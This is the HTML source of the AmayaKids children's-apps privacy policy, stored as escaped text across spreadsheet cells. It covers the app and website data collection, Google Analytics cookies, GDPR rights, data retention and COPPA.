            &lt;a class="navbar-brand" href="/"&gt;_x005F_x000D_
                &lt;img src="assets/images/logo.png"&gt;_x005F_x000D_
            &lt;/a&gt;_x005F_x000D_
            &lt;a class="navbar-brand d-none" href="#"&gt;_x005F_x000D_
                AmayaKids_x005F_x000D_
            &lt;/a&gt;_x005F_x000D_
            &lt;button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNavAltMarkup" aria-controls="navbarNavAltMarkup" aria-expanded="false" aria-label="Toggle navigation"&gt;_x005F_x000D_
                &lt;span class="navbar-toggler-icon"&gt;&lt;/span&gt;_x005F_x000D_
            &lt;/button&gt;_x005F_x000D_
            &lt;div class="collapse navbar-collapse" id="navbarNavAltMarkup"&gt;_x005F_x000D_
                &lt;ul class="navbar-nav"&gt;_x005F_x000D_
                    &lt;div class="focus"&gt;&lt;/div&gt;_x005F_x000D_
                    &lt;li class="nav-item first"&gt;_x005F_x000D_
                        &lt;a class="nav-link" href="/#apps"&gt;Our apps&lt;/a&gt;_x005F_x000D_
                    &lt;/li&gt;_x005F_x000D_
                    &lt;li class="nav-item"&gt;_x005F_x000D_
                        &lt;a class="nav-link" href="/#about"&gt;About us&lt;/a&gt;_x005F_x000D_
                    &lt;/li&gt;_x005F_x000D_
                    &lt;li class="nav-item"&gt;_x005F_x000D_
                        &lt;a class="nav-link" href="/#reviews"&gt;Reviews&lt;/a&gt;_x005F_x000D_
                    &lt;/li&gt;_x005F_x000D_
                    &lt;li class="nav-item"&gt;_x005F_x000D_
                        &lt;a class="nav-link" href="/#contact"&gt;Contact us&lt;/a&gt;_x005F_x000D_
                    &lt;/li&gt;_x005F_x000D_
                    &lt;!--</t>
  </si>
  <si>
    <t>&lt;li class="nav-item dropdown"&gt;_x005F_x000D_
                        &lt;a class="nav-link" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"&gt;_x005F_x000D_
                          &lt;img src="assets/images/usa.png" alt=""&gt;_x005F_x000D_
                        &lt;/a&gt;_x005F_x000D_
                        &lt;div class="dropdown-menu" aria-labelledby="navbarDropdown"&gt;_x005F_x000D_
                            &lt;a class="dropdown-item" href="#"&gt;_x005F_x000D_
                                &lt;img src="assets/images/ru.jpg" alt=""&gt;_x005F_x000D_
                            &lt;/a&gt;_x005F_x000D_
                       &lt;/li&gt; --&gt;_x005F_x000D_
                &lt;/ul&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
        &lt;div class="bread-crumb d-none"&gt;_x005F_x000D_
            &lt;div class="container"&gt;_x005F_x000D_
                &lt;ul&gt;_x005F_x000D_
                    &lt;li&gt;&lt;a href="/" class="totop"&gt;Home Page&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                    &lt;li&gt;&lt;a class="active"&gt;Our apps&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                &lt;/ul&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/nav&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
    &lt;div class="container-fluid "&gt;_x005F_x000D_
        &lt;div class="container container-privacy"&gt;_x005F_x000D_
            &lt;h1 style="text-align: center;"&gt;&lt;strong&gt; Privacy Policy&lt;/strong&gt;&lt;/h1&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Last Updated:&amp;nbsp;&lt;/span&gt;&lt;span</t>
  </si>
  <si>
    <t>style="font-weight: 400;"&gt;OCTOBER 10, 2021&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Welcome! This Privacy Policy explains how AmayaKids (&amp;ldquo;AmayaKids" or "we") collects and uses your personal information while you play AmayaKids's games ("Games") and/or use AmayaKids's websites that link to this Privacy Policy ("Websites").&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;We may make changes to this Privacy Policy from time to time. If we make any material changes to this Privacy Policy, we will notify you via email if we have your email address on record, or via a notice on the Websites and/or Games prior to the change becoming effective.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;strong&gt;&lt;em&gt;AmayaKids&lt;/em&gt;&lt;/strong&gt;&lt;em&gt;&lt;span style="font-weight: 400;"&gt; is committed to making sure that kids&amp;rsquo; privacy is safeguarded and we aim to comply with all (privacy) regulations worldwide, like the Children&amp;rsquo;s Online Privacy Protection Act (COPPA) in the US.</t>
  </si>
  <si>
    <t>If you want to know what data is collected by our apps and how this is handled, please review this policy. If you have any questions or concerns, send us an email via info@amayasoft.com, we are here to help.&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;When using the apps we produce for parents and children (the &amp;ldquo;&lt;/span&gt;&lt;strong&gt;Games&lt;/strong&gt;&lt;span style="font-weight: 400;"&gt;&amp;rdquo;) our company and its subsidiaries (together &amp;ldquo;&lt;/span&gt;&lt;strong&gt;AmayaKids&lt;/strong&gt;&lt;span style="font-weight: 400;"&gt;&amp;rdquo; or &amp;ldquo;&lt;/span&gt;&lt;strong&gt;We&lt;/strong&gt;&lt;span style="font-weight: 400;"&gt;&amp;rdquo;) may collect information including usage data.&amp;nbsp; When adults or parents visit &lt;/span&gt;&lt;a href="http://www.amayakids.com"&gt;&lt;span style="font-weight:</t>
  </si>
  <si>
    <t>400;"&gt;www.amayakids.com&lt;/span&gt;&lt;/a&gt;&lt;span style="font-weight: 400;"&gt;&amp;nbsp; (the &amp;ldquo;&lt;/span&gt;&lt;strong&gt;Website&lt;/strong&gt;&lt;span style="font-weight: 400;"&gt;&amp;rdquo;), we may also collect information on the usage of our website for adults and parents.&amp;nbsp; This data collection is discussed in greater detail below.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;If you are accessing the Games or Website from within the European Union (EU) or are an EU citizen, please review the Lawful Bases for Processing Personal Data and Individual Rights sections below for more information on your how your personal data will be processed and the rights you have regarding this processing.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;h2&gt;&lt;strong&gt; Information collected through our Games&lt;/strong&gt;&lt;/h2&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Information Collected Automatically By:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;strong&gt;&lt;em&gt;AmayaKids&lt;/em&gt;&lt;/strong&gt;&lt;span style="font-weight: 400;"&gt;.&amp;nbsp; Most of our apps note your IP address and use this to determine the country the device is located. The IP address is not stored on our systems, but we keep track of the country our app is functioning in.</t>
  </si>
  <si>
    <t>This information cannot be connected to a unique device and is never shared with third parties.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;For every device a Game is installed on, AmayaKids may collect some analytical information. We collect this information to improve the performance and reliability of our Games and to get a better understanding of what users prefer.</t>
  </si>
  <si>
    <t>We do not link any of this information in any way to individuals or any other information we might obtain. We do not share, sell or in any other way give other persons or companies outside AmayaKids access to this information, except to comply with a legal obligation to do so (e.g. court order) or in case the ownership of the information changes due to a merger, acquisition or restructuring involving AmayaKids.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Information you provide through the Games:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Child users do not have the ability to provide any personal information when using the Games beyond what has collected automatically (as noted above).&amp;nbsp; Adult users can use the Support link within the adult/parent area of the app to access the customer support features on the Website. If you submit a support ticket on our Website, you must provide an email address and may provide your name.</t>
  </si>
  <si>
    <t>We do not require you to provide your full name to contact us.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;h2&gt;&lt;strong&gt; Information collected through our Websites:&lt;/strong&gt;&lt;/h2&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Information collected automatically:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Our Websites are intended for use by parents and adults and use Google Analytics (third party scripts) that collect the following information and might (also) store such information as a cookie on the device you use to access our webpage:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;em&gt;&lt;span style="font-weight: 400;"&gt;Demographics &lt;/span&gt;&lt;/em&gt;&lt;span style="font-weight: 400;"&gt;(browser language, country, city);&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;em&gt;&lt;span</t>
  </si>
  <si>
    <t>style="font-weight: 400;"&gt;System information &lt;/span&gt;&lt;/em&gt;&lt;span style="font-weight: 400;"&gt;(browser, OS, service provider);&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;em&gt;&lt;span style="font-weight: 400;"&gt;Mobile &lt;/span&gt;&lt;/em&gt;&lt;span style="font-weight: 400;"&gt;(OS, service provider, screen resolution);&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;em&gt;&lt;span style="font-weight: 400;"&gt;Acquisition channel &lt;/span&gt;&lt;/em&gt;&lt;span style="font-weight: 400;"&gt;(source from where the user clicked, most of it is not revealed by Google);&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight:</t>
  </si>
  <si>
    <t>400;"&gt;&lt;em&gt;&lt;span style="font-weight: 400;"&gt;Site behavior &lt;/span&gt;&lt;/em&gt;&lt;span style="font-weight: 400;"&gt;(which pages users visit, duration of visit); and&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;em&gt;&lt;span style="font-weight: 400;"&gt;Remarketing list &lt;/span&gt;&lt;/em&gt;&lt;span style="font-weight: 400;"&gt;(remembers user visit via cookie for future advertising).&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;In order for you to use any of our Websites, you should agree with the placement of the specific cookies and their use.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Information</t>
  </si>
  <si>
    <t>you provide:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;In addition to the information automatically collected when you visit the Website, parents may provide their name and email address for two specific purposes:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;span style="font-weight: 400;"&gt;Signing up for our parent newsletter&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;span style="font-weight: 400;"&gt;Contacting us or our customer support team&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;To provide you with the newsletter, we require you to provide your email address. We use the email address only to provide you with the newsletter and for no other purpose. And you can opt-out of receiving the newsletters at any time using the unsubscribe link or by contacting us at info@amayasoft.com&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;If you submit a support ticket or reach out to us using the contact form on our Website, you must provide an email address and may provide your name.</t>
  </si>
  <si>
    <t>We do not require you to provide your full name to contact us.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;h2&gt;&lt;strong&gt; How your information is used&lt;/strong&gt;&lt;/h2&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;We use the information collected through our Games and Websites for getting a better understanding of their use and the preferences of our visitors. We do not use this information for any other purpose or make it available to any other party (beyond those disclosed above), unless in order to comply with a legal obligation to do so (e.g. court order) or in case the ownership of the information changes due to a merger, acquisition or restructuring involving AmayaKids.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;h2&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>How your information is shared&lt;/strong&gt;&lt;/h2&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Any personal information automatically collected by us is used solely to improve our service and we do not provide this information to any third party (beyond those disclosed above), unless in order to comply with a legal obligation to do so (e.g. court order) or in case the ownership of the information changes due to a merger, acquisition or restructuring involving AmayaKids.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Information that is collected on our Websites by scripts from Google will also be available to Google. AmayaKids has no control over the collection or usage of this information by Google and does not accept any liability for the same. However, we believe that the collection and usage of information by Google is compliant with relevant regulations.</t>
  </si>
  <si>
    <t>According to the disclosures of Google, they will use this information as follows:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;According to the best of our knowledge, Google uses the information collected to provide us with a better understanding of the use of our Websites and of the preferences of our visitors. Google will also use the information collected to personalize advertisements that are shown to you while surfing the web or while using Google services. Please refer to&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;a href="http://www.google.com/policies/privacy/"&gt;&lt;span style="font-weight: 400;"&gt;http://www.google.com/policies/privacy/&lt;/span&gt;&lt;/a&gt;&lt;span style="font-weight: 400;"&gt; and more specifically here: &lt;/span&gt;&lt;a href="https://support.google.com/adwordspolicy/answer/143465?hl=en&amp;amp;rd=1"&gt;&lt;span style="font-weight: 400;"&gt;https://support.google.com/adwordspolicy/answer/143465?hl=en&amp;amp;rd=1&lt;/span&gt;&lt;/a&gt;&lt;span style="font-weight: 400;"&gt; for more information. You can also opt-out using the following Google tool: Google Analytics opt-out browser add-on (&lt;/span&gt;&lt;a href="https://tools.google.com/dlpage/gaoptout/"&gt;&lt;span style="font-weight: 400;"&gt;https://tools.google.com/dlpage/gaoptout/&lt;/span&gt;&lt;/a&gt;&lt;span style="font-weight: 400;"&gt;). Click here to opt-out of Google Analytics.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;h2&gt;&lt;strong&gt;Lawful bases for processing personal data&lt;/strong&gt;&lt;/h2&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;If you are an individual in the European Union (EU) or an EU citizen, we collect and process data about you only where we have legal bases for doing so under applicable EU laws.</t>
  </si>
  <si>
    <t>This means we collect and process your data only when:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;span style="font-weight: 400;"&gt;It is necessary for a legitimate interest (which is not overridden by your individual privacy interests), such as preventing fraud, improving the Website, and increasing the security of the Website and network infrastructure;&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;span style="font-weight: 400;"&gt;You have consented to this collection and processing for a specific purpose;&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;span style="font-weight: 400;"&gt;It is necessary to fulfill our contractual obligations; or&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;span style="font-weight: 400;"&gt;It is necessary to comply with a legal obligation.&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Where we rely on your consent to process your personal data, you have the right to withdraw or decline consent at any time. If you wish to withdraw your consent, please contact us using the information in the Contacts for the Individual Rights Requests section.&amp;nbsp; Some examples of our legitimate interests and the data being processed include:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;span style="font-weight: 400;"&gt;Network and information security (password, IP address, Device ID)&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;span style="font-weight: 400;"&gt;Customer Support and fraud prevention (name, email address)&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;span style="font-weight: 400;"&gt;Improving our products and services (hardware information, activity logs)&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Where we rely on our legitimate interests to process your personal data, you have the right to object.&amp;nbsp; More information on exercising this right can be found in the Individual Rights section below.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;If you have any questions about or need further information concerning the legal basis on which we collect and use your personal data, please contact us at info@amayasoft.com.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;h2&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>We do not collect any other information&lt;/strong&gt;&lt;/h2&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;When you download and use our Games, or surf our Websites, we don&amp;rsquo;t require you to provide any information and we don&amp;rsquo;t collect any personal information, except general information explained above, including unique device identifiers and cookies (as specified above) to anonymously identify your computer or device so we can deliver a better experience. We do not share such information with third parties.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;We do not knowingly contact or collect personal information from children under 16. If you believe we have inadvertently collected such information, please contact us so we can remove the information.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;h2&gt;&lt;strong&gt;Individual Rights&lt;/strong&gt;&lt;/h2&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight:</t>
  </si>
  <si>
    <t>400;"&gt;AmayaKids makes certain choices available to you when it comes to your personal data.&amp;nbsp; Please review the below information outlining your choices and how to exercise them. We will respond to all requests within a reasonable timeframe.&amp;nbsp; If our full response will ever take more than a month due to complexity or scope, we will notify you of this and keep you updated.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Review and update your data&lt;/span&gt;&lt;span style="font-weight: 400;"&gt;: You have the right to access and update any personal data that we have collected.&amp;nbsp; To review the data that we have and update it as required, please submit a request using the contact information at the end of this section.&amp;nbsp; We may request more information to confirm your identity before releasing or modifying any personal data.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Delete your data&lt;/span&gt;&lt;span style="font-weight: 400;"&gt;: You also the right to have your personal data deleted. This is sometimes known as the &amp;lsquo;right to be forgotten&amp;rsquo;.&amp;nbsp; To request that we delete all personal data about you, please submit a request using the contact information at the end of this section.&amp;nbsp; We may request more information to confirm your identity before deleting any personal data.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;After you delete your personal data from our services, we may not immediately delete residual copies from our active servers and may not immediately remove data from our backup systems for archiving, prevention of fraud and abuse, analytics, satisfaction of legal obligations, or where we otherwise reasonably believe that we have a legitimate reason to do so.&amp;nbsp; We may also decline to honor this request in certain specific situations, such as if the data is necessary to comply with a legal obligation or to exercise/defend a legal claim.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Restrict Processing&lt;/span&gt;&lt;span style="font-weight: 400;"&gt;: You have the right to restrict how we process your personal data in certain circumstances.&amp;nbsp; This is an alternative to requesting the deletion of your data.</t>
  </si>
  <si>
    <t>Rather than requesting we delete all your personal data, you may request that we limit our uses of your personal data to specific purposes.&amp;nbsp; You may wish to request we restrict our processing if you contest the accuracy of your personal data and we are working to verify this information, or if you want us to retain your personal data in connection to a legal claim but cease processing it.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Data Portability&lt;/span&gt;&lt;span style="font-weight: 400;"&gt;: You have the right to obtain copies of your information in a structured, commonly used format that you can move your data between our service and the services of others.&amp;nbsp; We may request more information to confirm your identity before providing any personal data.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Right to Object&lt;/span&gt;&lt;span style="font-weight: 400;"&gt;: You have the right to object to the processing of your personal data for direct marketing purposes or when our processing of your data is based on legitimate interests.&amp;nbsp; You may request that we stop processing your personal data for direct marketing purposes. This is an absolute right and we cannot refuse this request.</t>
  </si>
  <si>
    <t>Beyond direct marketing, if you wish to exercise this right, you must give specific reasons why you object to our processing of your data, based on your particular situation.&amp;nbsp; Even after receiving such a request, we may continue processing if it is necessary for the exercise/defense of a legal claim or if we can demonstrate a compelling legitimate ground for the processing.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;If any request made under this section is clearly unfounded or excessive, we may reject the request or require a reasonable fee to honor the request.&amp;nbsp; If we decide to reject your request, we will inform you of the reasons for not taking action and provide information on other possible remedies. If we decide that a reasonable fee is necessary, we will promptly inform you and will comply with the request upon receipt of this fee.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;h2&gt;&lt;strong&gt;Contact for Individual Rights Requests&lt;/strong&gt;&lt;/h2&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Please use the below information when submitting a request to exercise any of the above rights.&amp;nbsp; Please do not submit requests across multiple communications channels. We will make all efforts to respond to your request within a reasonable timeframe.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Email&lt;/span&gt;&lt;span style="font-weight: 400;"&gt;: info@amayasoft.com&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;If you are an EU citizen or reside in the EU and wish to raise a concern about our use of your information (and without prejudice to any other rights you may have), you have the right to do so with your local supervisory authority.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;h2&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Data Retention&lt;/strong&gt;&lt;/h2&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;AmayaKids may retain users&amp;rsquo; data for the following purposes:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;span style="font-weight: 400;"&gt;To develop new features and improve the Games and Website;&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;span style="font-weight: 400;"&gt;To support subsequent customer service inquiries;&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;span style="font-weight: 400;"&gt;To improve the safety and security of the Games and Website; or&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;li style="font-weight: 400;"&gt;&lt;span style="font-weight: 400;"&gt;Comply with our legal obligations.&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;We will retain your information for as long as is reasonably necessary in relation to the purposes for which this data was collected.&amp;nbsp; In many instances, we will retain your data while it is necessary for your use of the Games or Website, which may include maintaining this information beyond when you cease using the Games or Website.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;h2&gt;&lt;strong&gt;Updates to this Privacy Policy&lt;/strong&gt;&lt;/h2&gt;_x005F_x000D_
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;This privacy policy was last updated on the date that appears at the top of this document.&amp;nbsp; Our privacy policy may change from time to time, and we explicitly reserve our right to do so. If we make any material changes to our policies, we will place a prominent notice on our website or application.&amp;nbsp; We will obtain prior parental consent if any changes we make to this Policy affect users under the age of 13 in a way that requires such consent under COPPA.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;/ul&gt;    &lt;/div&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
&lt;div class="footer nav"&gt;_x005F_x000D_
    &lt;div class="container"&gt;_x005F_x000D_
        &lt;div class="totop"&gt;_x005F_x000D_
            &lt;svg aria-hidden="true" data-prefix="fas" data-icon="chevron-up" class="svg-inline--fa fa-chevron-up fa-w-14" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"&gt;&lt;path d="M240.971 130.524l194.343 194.343c9.373 9.373 9.373 24.569 0 33.941l-22.667 22.667c-9.357 9.357-24.522 9.375-33.901.04L224 227.495 69.255 381.516c-9.379 9.335-24.544 9.317-33.901-.04l-22.667-22.667c-9.373-9.373-9.373-24.569 0-33.941L207.03 130.525c9.372-9.373 24.568-9.373 33.941-.001z"&gt;&lt;/path&gt;&lt;/svg&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
        &lt;h4 class="copy"&gt;&amp;copy; AmayaKids &lt;script type="text/javascript"&gt;document.write(new Date().getFullYear())&lt;/script&gt;_x005F_x000D_
               &lt;!--  &lt;p&gt;Address&lt;/p&gt;</t>
  </si>
  <si>
    <t>--&gt;_x005F_x000D_
            &lt;/h4&gt;_x005F_x000D_
        &lt;ul class="social"&gt;_x005F_x000D_
            &lt;li class="facebook"&gt;_x005F_x000D_
                &lt;a href=""&gt;&lt;svg aria-hidden="true" data-prefix="fab" data-icon="facebook-f" class="svg-inline--fa fa-facebook-f fa-w-9" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 264 512"&gt;&lt;path d="M76.7</t>
  </si>
  <si>
    <t>512V283H0v-91h76.7v-71.7C76.7 42.4 124.3 0 193.8 0c33.3 0 61.9 2.5 70.2 3.6V85h-48.2c-37.8 0-45.1 18-45.1 44.3V192H256l-11.7 91h-73.6v229"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;_x005F_x000D_
            &lt;/li&gt;_x005F_x000D_
            &lt;li class="vk"&gt;_x005F_x000D_
                &lt;a href=""&gt;&lt;svg aria-hidden="true" data-prefix="fab" data-icon="vk" class="svg-inline--fa fa-vk fa-w-18" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0</t>
  </si>
  <si>
    <t xml:space="preserve">576 512"&gt;&lt;path d="M545 117.7c3.7-12.5 0-21.7-17.8-21.7h-58.9c-15 0-21.9 7.9-25.6 16.7 0 0-30 73.1-72.4 120.5-13.7 13.7-20 18.1-27.5 18.1-3.7 0-9.4-4.4-9.4-16.9V117.7c0-15-4.2-21.7-16.6-21.7h-92.6c-9.4 0-15 7-15 13.5 0 14.2 21.2 17.5 23.4 57.5v86.8c0 19-3.4 22.5-10.9 22.5-20 0-68.6-73.4-97.4-157.4-5.8-16.3-11.5-22.9-26.6-22.9H38.8c-16.8 0-20.2 7.9-20.2 16.7 0 15.6 20 93.1 93.1 195.5C160.4 378.1 229 416 291.4 416c37.5 0 42.1-8.4 42.1-22.9 0-66.8-3.4-73.1 15.4-73.1 8.7 0 23.7 4.4 58.7 38.1 40 40 46.6 57.9 69 57.9h58.9c16.8 0 25.3-8.4 20.4-25-11.2-34.9-86.9-106.7-90.3-111.5-8.7-11.2-6.2-16.2 0-26.2.1-.1 72-101.3 79.4-135.6z"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;_x005F_x000D_
            &lt;/li&gt;_x005F_x000D_
            &lt;li class="youtube"&gt;_x005F_x000D_
                &lt;a href=""&gt;&lt;svg aria-hidden="true" data-prefix="fab" data-icon="youtube" class="svg-inline--fa fa-youtube fa-w-18" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 576 512"&gt;&lt;path fill="currentColor" d="M549.655 124.083c-6.281-23.65-24.787-42.276-48.284-48.597C458.781 64 288 64 288 64S117.22 64 74.629 75.486c-23.497 6.322-42.003 24.947-48.284 48.597-11.412 42.867-11.412 132.305-11.412 132.305s0 89.438 11.412 132.305c6.281 23.65 24.787 41.5 48.284 47.821C117.22 448 288 448 288 448s170.78 0 213.371-11.486c23.497-6.321 42.003-24.171 48.284-47.821 11.412-42.867 11.412-132.305 11.412-132.305s0-89.438-11.412-132.305zm-317.51 213.508V175.185l142.739 81.205-142.739 81.201z"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;_x005F_x000D_
            &lt;/li&gt;_x005F_x000D_
        &lt;/ul&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
&lt;script type="text/javascript" src="assets/js/bootstrap.bundle.min.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script type="text/javascript" src="assets/js/slick.min.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script type="text/javascript" src="assets/js/custom.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script type="text/javascript" src="assets/js/automatization.js"&gt;&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
